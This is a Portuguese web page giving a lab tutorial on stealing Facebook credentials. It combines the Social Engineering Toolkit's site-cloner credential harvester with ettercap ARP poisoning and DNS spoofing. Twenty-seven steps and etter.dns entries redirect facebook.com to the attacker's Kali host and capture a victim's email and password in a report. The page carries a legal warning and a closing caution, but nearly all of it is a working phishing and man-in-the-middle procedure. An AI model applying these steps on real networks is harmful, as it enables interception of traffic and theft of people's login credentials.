Criar um Site Grátis Fantástico
Translate this Page



ONLINE
1





Partilhe esta Página



Total de visitas: 131928
arp poisining
arp poisining

Facebook – ARP Poisoning usando SET e ettercap

 

O ataque do tipo ARP-Poisoning (ou ARP-Spoofing) é o meio mais eficiente de executar o ataque conhecido por Man-In-The-Middle, que permite que o atacante intercepte informações confidenciais posicionando-se no meio de uma conexão entre duas ou mais máquinas.

A técnica de ARP-Poisoning é aplicada apenas em redes Ethernet. Basicamente, um sistema conectado a um IP ou LAN Ethernet tem dois endereços. O primeiro endereço é o MAC, que é atribuído à placa de rede (NIC1) possuída pelo usuário. Os endereços MAC são (ou supõe-se ser) únicos e utilizando esse endereço o protocolo Ethernet envia os dados. O protocolo Ethernet constrói frames de dados que consistem de blocos de 1500 bytes. Um frame Ethernet consiste do cabeçalho Ethernet, contendo o endereço MAC do computador origem e do computador destino.

*Atenção! Roubo de Informações é CRIME!, leia o artigo sobre a LEI Nº 12.737

Laboratório:

set_ettercap

Passo 01

Abra o aplicativo SET através do menu: Applications > Kali Linux > Exploitation Tools > Social Engineering Toolkit > se-toolkit

Digite o número 1 Social-Engineering Attacks ( Ataque de Engenharia Social )

set_ettercap_01

Passo 02

Digite o número 2 Website Attack Vectors

set_ettercap_02

Passo 03

Digite o número 3 Credential Harvester Attack Method

set_ettercap_03

Passo 04

Digite o número 2 Site Cloner

set_ettercap_04

Passo 05

Digite o IP do atacante host KALI 10.10.10.130

set_ettercap_05

Passo 06

Digite o endereço do site que deseja clonar no exemplo: www,facebook.com

set_ettercap_06

Passo 07

Toda estrutura esta pronta para visualizar as informações, este terminal deve ficar aberto.

set_ettercap_07

Passo 08

Edite o arquivo etter.dns para adicionar o novo destino da url www.facebook.com

set_ettercap_08

Passo 09

Insira as linhas e salve o arquivo

# FACEBOOK

facebook.com A 10.10.10.130

*.facebook.com A 10.10.10.130

www.facebook.com PTR 10.10.10.130

set_ettercap_09

Passo 10

Certifique-se qual é o Gateway da rede usando o comando route

set_ettercap_10

Passo 11

Abra o aplicativo ettercap através do menu: Applications > Kali Linux > Sniffing/Spoofing > Network Sniffers > ettercap-graphical

Clique em Sniff > Unified sniffing…

set_ettercap_11

Passo 12

Selecione a Interface de Rede> eth0

set_ettercap_12

Passo 13

Clique em Hosts > Scan for hosts

set_ettercap_14

Passo 14

4 Hosts foram encontrados, Clique em Hosts > Hosts list para visualizá-los

set_ettercap_15

Passo 15

Selecione os hosts Gateway ( 10.10.10.2 ) e WIN-7 ( 10.10.10.134 ) e clique em Add to Target 2

set_ettercap_16

Passo 16

Clique em Plugins > Manage the plugins

set_ettercap_17

Passo 17

De um duplo-clique em dns_spoof para ativar o plugin

set_ettercap_18

Passo 18

Clique em Mitm > Arp poisoning…

set_ettercap_19

Passo 19

Selecione a opção Sniff remote conections

set_ettercap_20

Passo 20

O grupo com os hosts é criado

set_ettercap_21

Passo 21

Clique em Start > Start sniffing

set_ettercap_22

Passo 22

O sniffing é iniciado

set_ettercap_23

Passo 23

No host WIN-7 ( 10.10.10.134 ) acesse o site www.facebook.com e informe o e-mail e senha de acesso

set_ettercap_24

Passo 24

Volte a tela do passo 07 e visualize que o usuário e senha são explicitamente exibidos

set_ettercap_25

Passo 25

Ao pressionar as teclas CTRL + C um relatório é gerado no caminho: /root/.set/reports

set_ettercap_26

Passo 26

Para visualizar estes arquivos ative o modo de exibição de arquivos ocultos View > Show Hidden Files

set_ettercap_27

Passo 27

Relatório contendo usuário e senha do site www.facebook.com

set_ettercap_28

MENSAGEM

Tome muito cuidado na hora de realizar o acesso aos seus E-mails, Bancos, Facebook, Twitter, Google+, Instagram pois seus dados podem estar sendo capturados por um criminoso.